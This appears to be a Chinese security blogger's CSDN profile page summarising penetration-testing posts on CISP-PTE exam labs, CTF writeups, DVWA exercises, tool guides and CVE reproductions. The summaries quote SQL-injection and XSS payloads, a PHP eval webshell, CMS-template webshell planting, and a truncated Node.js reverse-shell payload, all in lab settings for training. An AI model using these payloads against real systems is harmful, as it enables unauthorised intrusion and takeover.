自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(37)
  • 收藏
  • 关注

原创 渗透实战-Burp无法抓取https包

Burp无法抓取https包

2023-02-21 10:41:00 2249 1

原创 CISP-PTE 实操综合题分享

环境可以在这里下载:https://download.csdn.net/download/beirry/87272606

2022-12-13 15:53:57 1346 2

原创 CISP-PTE 基础讲解

此篇文章是写给对于对安全行业的术语没有一个了解的初学者。

2022-12-09 23:58:40 1096

原创 CISP-PTE 信息泄露

信息泄露在当今网络上也是非常常见的,敏感信息泄露通常是高危漏洞起步,普通信息泄露通过结合其他漏洞也能达到高危漏洞的效果。敏感信息泄露包括但不限于源代码压缩包泄漏、SQL 注入、越权或者直接获取大量用户、员工信息。普通信息泄露包括但不限于未涉及敏感数据的 SQL 注入、影响数据量有限或者敏感程度有限的越权、源代码或系统日志等信息泄露。轻微信息泄露包括但不限于路径、SVN 信息泄露、PHPinfo、异常和含有少量敏感字段的调试信息、日志打印及配置等泄露。

2022-12-09 23:05:31 364

原创 渗透实战-抓取APP流量包

现在渗透测试不仅要对传统的web测试,还要对APP,微信小程序,微信公众号进行测试。接下来我将对微信小程序来进行抓包发送给burpsuit。这里选择本地模式,管理员启动点击连接引擎配置系统代理配置以下内容,点击配置HTTP/HTTPS代理启用成功打开左边的手工渗透测试,点击MITM,点击劫持启动,即可运行可以看到右上角有手动劫持,自动放行,被动日志三个选项,现在处于自动放行状态,则不抓包输入手机号,获取验证码可以看到抓取到数据包

2022-12-04 23:06:46 2999 1

原创 渗透实战-抓取微信小程序流量包

现在渗透测试不仅要对传统的web测试,还要对APP,微信小程序,微信公众号进行测试。接下来我将对微信小程序来进行抓包发送给burpsuit。Proxifier是一款功能非常强大的代理客户端。我们将用此软件来抓取微信小程序的流量包。勾选Enable HTTP proxy servers support选择proxy Servers添加监听地址点击此按钮,设置规则添加规则以下是添加规则以小程序肯德基(疯狂星期四YYDS)为例,先打开小程序,再打开任务管理器,找到小程序肯德基+的进程,右键打

2022-12-04 22:39:24 2316

原创 Python安全工具编写-Socket实现远程连接

这个章节需要先对网络具有一定的了解,主要会讲到TCP和UDP,此篇文章不会太多过于介绍网络基础。

2022-12-03 00:51:24 1347

原创 渗透实战-通过fofa+rad+xray批量挖掘src

这篇文章主要是实现通过fofa来收集资产信息,将信息传递给rad,xray来进行挖掘src。

2022-10-23 23:35:14 1800 7

原创 Python安全工具编写-命令行参数

当我们使用像nmap,sqlmap这类工具时,都是通过命令行的方式去运行的。那么怎么将我们要填入的参数写入到工具里呢?这里介绍几个模块:sys,optparse,argparse先来介绍sys。

2022-08-15 19:27:25 302 2

原创 渗透常用工具-Goby

许久没更新这个栏目了,今天就来介绍一下经常用到的工具:Goby初学安全的朋友可能对这个工具不太熟悉,这个主要是用作于扫描资产是否存在漏洞的工具,里面内置了丰富的POC(漏洞验证)包,在检测后并会出一份详细的报告给到使用者。根据自己的操作系统下载对应的版本,我这里是windows版本,所以下载的是第一个。下载后得到一个压缩包,解压后可以看到以下文件,打开Goby.exe文件在左下角可以设置语言为中文。点击Scan可以建立扫描任务。建立扫描任务后可以看到扫描的信息资产信息:漏洞信息:扫描

2022-06-29 15:57:49 8481 2

原创 CISP-PTE XSS进阶实战+Bypass绕过技巧

通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。还是以DVWA靶场,获取cookie为例子:这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。受害机能访问到kali即可。跳转到/var/www/html/下,新建一个php文件,文件内容如下:返回到html目录下,给html一个777权限,防止实验失败。打开dvwa反射型页面,用low等级测试。POC我们在上一章已经验证过了,就不再验

2022-06-13 16:44:58 1268

原创 CISP-PTE XSS基础

同源策略百度:同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。同源的意思是指域名,协议,端口相同。不同源的客户端脚本(JavaScript,actionscript)再没明确授权的情况下,不能读写对方的资源。如果两个页面的协议,端口和域名都相同,则两个页面具有相同的源。以百度为例:https://www.baidu.co

2022-06-02 12:25:51 922

原创 渗透常用工具-SQLMap

sqlmap 是用python编写的渗透测试工具,可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。通常检测到存在sql注入点时,就可以利用此工具来进行验证。下载使用SQLMap下载地址:https://sqlmap.org/#downloadPython下载地址:https://www.python.org/downloads/根据以上下载地址来获取安装包SQLmap:Python:下载完后安装即可使用。使用方法打开sqlmap所在目录,打开命令行。在命令行中输入pyt

2022-05-08 23:05:50 1134

原创 CISP-PTE SQL注入 进阶篇之实战模拟

此次实战模拟的靶场为DVWA,将等级调为MediumMedium这是由POST传值传输数据用Hackbar来传输POST,id=2,则数据更新,说明id是我们的注入点判断类型输入1 and 0#,无返回值,则是数字型判断显示位从order by 1#输入到 order by 3#开始报错,则显示位只有2位查看显示位输入-1 union select 1,2#,看看1,2会出现在哪个位置查表输入-1 union select 1,group_concat(table_name

2022-04-18 20:17:36 481

原创 CISP-PTE SQL注入 进阶篇 Bypass绕过技巧

相信大家看完入门篇后,基本掌握了SQL注入的语法,那么这章主要讲下Bypass的绕过技巧过滤引号当注入点过滤引号时,我们可以用Hex encoding或者CHAR() Function绕过假设有一个查询语句为select * from user where id='[我们输入的值]';Hex encoding原查询语句select * from user where id=‘0x312723’;解析为select * from user where id=‘1’#';CHAR() Functi

2022-04-15 14:16:43 3752 2

原创 红队攻防知识分享-红日安全团队靶场1-速通版

此版本是根据日常实战中来渗透攻击,如果为了学习,建议先看学习版本外网打点端口扫描通过扫描端口得知web站点开启目录扫描得到用的数据库是mysql和一个站点的备份文件通过文件包拼接得到站点url:http://192.168.54.128/yxcms,使用的cms是yxcms,版本为1.2.1知道yxcms,直接百度找已知漏洞访问站点后台,尝试默认密码admin,123456通过百度得知,编辑前台模板的功能可以插入一句话木马,则直接拿webshell,获取路径,直接在备份包里搜索前台

2022-04-14 12:36:08 2916

原创 红队攻防知识分享-红日安全团队靶场1

环境搭建靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境拓扑图:以下是虚拟机网络配置虚拟机网络配置Windows7 x64VMnet1:192.168.52.128;VMnet2:192.168.54.128Win2k3 MeasploitableVMnet1:192.168.52.141Windows Server 2008 R2 x64VMnet1:192.168.52.138kaliV

2022-03-23 13:33:51 7990 1

原创 渗透常用工具-AWVS使用

AWVS安装AWVS我是装在Docker上的,在VPS中部署好Docker后,敲入以下命令docker pull secfa/docker-awvs #拉取镜像docker run -it -d -p 8443:3443 secfa/docker-awvs #将Docker的3443端口映射到VPS的8443端口访问https://VPS的IP:8443默认账号密码:username: [email protected]: Admin123登录进来是这样一个页面扫描站点在

2022-03-01 12:36:57 6023

原创 Python安全工具编写-密码爆破

密码爆破其实是将把可能为密码的字符串集合逐一验证,通过验证返回的结果来找到密码。为了验证编写密码爆破工具的有效性,则用了DVWA靶场来验证。我们随意输入一串数字来看看返回的验证结果是如何。可以看到,只要密码不正确则页面会显示Username and/or password incorrect.那么根据这一特征,我们则可以利用密码爆破来编写爆破的框架了,首先我们确定我们爆破密码的必需品:1,模仿页面产生请求;2,密码尝试;3,获取返回页面特征import requestsdef function_

2022-02-23 11:24:58 5137 1

原创 CISP-PTE SQL注入 入门篇之实战模拟

此次实战模拟的靶场为DVWA,将等级调为low判断类型判断是否为数字类型1 and 0#,如果是数字类型,点击提交会报错。没报错,很明显不是数字类型,尝试字符类型1',如果页面报错,则是字符类型。判断显示位输入1 order by 1#一直输入到1 order by 3#,报错了说明显示位只有2个查看显示位-1' union select 1,2#将前面的1置空(无法查询到信息就可以了),查找显示位查看数据库信息-1' union select database(),@@vers

2021-12-22 17:26:23 684

原创 CISP-PTE SQL注入 入门篇

经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。判断查询类型select * from users where id=1这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击

2021-12-21 17:32:05 1385

原创 二向箔-百日打卡writeup26-30

NO.26按照提示来依次访问one,two,three访问two时则弹出了以下内容尝试sql注入,输入one'%23正常回显(%23是#的url编码,前端不会把#以及#后的内容传输到后端,所以要经过url编码才能传输)判断显示位order by [number]%23到5则报错,说明只有4个显示位查看显示位-one' union select 1,2,3,4%23查表-one' union select 1,2,3,group_concat(table_name) from informa

2021-12-20 11:33:04 347

原创 Python安全工具编写-pcap流量包重放

最近因为log4j漏洞,工作量急剧增加,卑微小乙没日没夜地进行应急处理,为了能测试是否能检测到log4j攻击,我专门写了一个脚本,当然这个脚本也不只是检测log4j,只要是pcap包放在指定目录下则可以重放。我写脚本的时候总喜欢先确认功能点,毕竟这是我们写代码的前提了。功能点:将指定目录中所有pcap文件全部找出重放1,找到指定目录(pcaps)中所有pcap文件def find_pcap(dir,filelist): for i in os.listdir(dir):#将目录下所有内容拉出来判断

2021-12-15 17:50:44 5445 2

原创 二向箔-百日打卡writeup21-25

NO.21xss弹窗测试直接填入<img src=x onerror=alert(1)>发现并没有弹窗,则打开F12看下情况,可以看到被value包含了,那么可以在输入框这样写,“ onkeydown="alert(1)回车可以看到我们输入的值被当作标签内容了在输入框按下一个字则会弹窗,也可以尝试下用onkeyup,当你在输入框中手指按下一个键放开时,则会弹窗NO.22这个标签也是输入标签,那么可以直接跟上题一样,双引号闭合前面的值,再输入οnkeyup=alert(1)//,也就是

2021-12-08 17:46:35 4055

原创 二向箔-百日打卡writeup16-20

NO.16还是登陆页面提示也很明显了,首先要注册一个admin账户,将admin=true一同发往服务端进行注册admin用户。得到flagNO.17看到&& ||很明显这道题是要命令执行了点击Get Ready,看到这个是利用GET传值方式传值那我们直接构造?domain=--version|cat /tmp/flag.txt得到flagNO18一开始以为是关于sql读取文件来获取内容结果尝试输入单引号,并不是报关于sql的错误那又很明显是命令执行了,输入|

2021-12-08 16:19:17 227

原创 CISP-PTE SQL注入-基础篇

在CISP-PTE考试中,题型大多都不会难,更多的是知识层面广泛,平时可以多做做CTF的基础题,对考试有一定的帮助。

2021-12-08 15:45:14 3958

原创 二向箔-百日打卡writeup 11-15

NO.11根据提示可以知道是未授权访问登录默认账号跳转到这个页面,我先检查了一下按钮,发现都点不开,结果是发现<a>根本就没有写链接往下滑,看到只有三篇日记,点击More进去看看一般日记都是一些私人敏感的事件,那么尝试去看4的日记修改url:https://rimovni.exeye.run/ne/diary/4得到flagNO.12这个提示也是非常明显了,就是测试xss无疑了直接测试<img src=x onerror=alert(1)>触发弹窗NO.1

2021-12-07 14:35:10 238

原创 红队攻防知识分享-被动信息收集

信息收集的基本要求1.全面:做到对目标所有的业务面和非业务面的存在点进行全面的信息收集。2.准确:对于收集到的信息尤其是重要信息要再三确认其信息的准确性,对信息的内容中所涉及的技术点要手动查看。3.时效:对于收集到的信息要注意信息产生的时间和收集到的时间,是否具有时间差,时间差能否接受,如果存在失效的信息要及时清除。4.清晰:对于收集到的信息要做到逻辑清晰,能清楚地分辨出各个收集到的信息之间的逻辑关系和资产之间的相对位置,对于总体目标要有清晰的资产逻辑和业务逻辑认识。...

2021-12-06 16:23:09 3425

原创 Python安全工具编写-网络空间搜索引擎收集信息

其实在fofa搜索页面已经给了脚本的编写规则和方法,都在API中我们Python安全工具编写脚本主要是通过调用FOFA的API来收集信息,这个是帮助文档:https://fofa.so/static_pages/api_help通过帮助文档我们可以确定这个脚本需要哪些东西1,输入查询内容2,将查询内容经过base64编码3,将返回内容输出成json格式4,筛选想要的内容5,输出内容那么这上面就是我们编写脚本的一个基本框架import requestsimport base64impo

2021-12-06 12:07:52 1327 2

原创 Python安全工具编写-搜索引擎收集信息

以下是基于传统引擎信息收集为例在写安全工具时,首先要确定好我们的功能点:1,请输入查询指令(要查询什么)2,与搜索引擎建立连接3,返回结果4,筛选出我们想要的元素那么我们将以上结果在必应上先操作一遍我们发现搜索引擎基本上传值方式都是GET传值,且将查询指令作为q的值传输给搜索引擎在进行翻页操作时,first值会发生变化,如第一页first为1,第二页为11,第三页为21。。。那么规律就出来了,每翻一页,则first会加10,且每一页显示的结果都为10条根据以上结果我们就可以确定基本的代码

2021-12-06 10:44:56 1604

原创 二向箔-百日打卡 writeup 6-10

NO.6点击start并无反应,看看源代码是跳转到哪里再看看网络模块,点击的时候是发生了什么点击时start,看到index页面的状态码是302,那么我们大概就知道是一个这样的流程,访问index时跳转到了hello。那么我们用burp抓个包,看看响应包,将抓到的包放入repeater模块,点击发送在浏览响应包时,发现flagNO.6这道题没有提示,就随意发挥了首先能访问的按钮都点一点,做一波信息收集。以下是我收集的能跳转的url,已过滤不主要的业务。第三,四个功能模块是我们主要要测试

2021-12-05 00:23:44 288

原创 红队攻防基础知识分享

此文章内容均来自Ms08067红队攻防培训中所学。基本的红队测试流程介绍1.接到项目合同并制定相应计划2.准备相应的工具和材料3.做第一次信息收集4.做漏洞扫描或攻击面测试5.针对突出的攻击面做具体的渗透6.进入环境之后的第二次信息收集7.提升权限8.维持权限9.寻找扩大攻击面的渠道10.清理攻击痕迹11.编写报告攻击机通过对web服务进行第一次信息收集,而后通过该站点存在的漏洞获取到该服务器的权限并进入到内网环境;再做第二次的信息收集,第二次的信息收集,是为了提升我们的权限;再提

2021-12-02 16:14:22 857

原创 二向箔-百日打卡writeup 1-5

NO.1点击提示按钮,可以看到我们需要以admin登录此处已经有一个默认账号了,还有一个注册按钮,尝试先登录默认账号。通过观察,看到cookie中有test字样,将test修改成admin,再刷新。登录成功!...

2021-12-02 15:08:26 1064

原创 CISP-PTE认证实操模拟题分享

CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场。SQL注入通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用到load_file命令来去获取文件信息![在这里插入图片描述](https://img-blog.csdnimg.cn/799462259f964b289ea74daadf2e6ccf.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2

2021-12-02 09:31:43 7144 2

原创 关于网络安全设备总结

关于网络安全设备总结这里只是介绍一下这些网络安全设备的定义,功能,以及它提供了哪些安全性功能,理论偏多。路由器路由器其实就是连接多个使用相同协议网络的设备,它的作用主要在网络层(OSI七层模型、TCP/IP四层模型)。它可以确定网络流量可以采取的最高有效路径。用现实生活来比喻就是我们从家里到学校中选择最快的那条路到达学校。大部分的路由器不会转发广播流量,如果不懂网络的话可以看看网络的一些知识点。安全相关:路由器中有个访问控制列表,就是阻止或允许流量的规则列表。路由器可以通过访问控制列表来过滤网络

2021-11-30 15:25:44 4945

原创 CVE-2020-25790(typesetter 文件上传)

vulfocus-typesetter 文件上传(CVE-2020-25790)从web端进入CMS,点击已上传的档案页面准备test.php文件,文件内容如下<?php @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码将test.php上传到该页面,出现报错,报错内容是permission denied.将test.php压缩成zip文件,再次上传上传成功,解压test.zip文件test.php文件解压成功获取t

2021-11-24 17:27:36 1234

原创 CVE-2017-5941 (nodejs 代码执行)

vulfocus-nodejs 代码执行 (CVE-2017-5941)复现环境攻击机(192.168.95.58)靶场环境(10.3.61.69)复现过程在含有nc文件目录下打开两个cmd,监听8888端口nc -lvp [端口]访问环境:http://10.3.61.69:55269账号随意输入,密码构造payload如下_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&amp

2021-11-24 17:07:25 1119

安服日常基线检查配置,提升安全基线防护

提升服务器安全基线配置

2024-03-27

CISP-PTE模拟环境

CSIP-PTE模拟环境镜像下载

2022-12-13

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除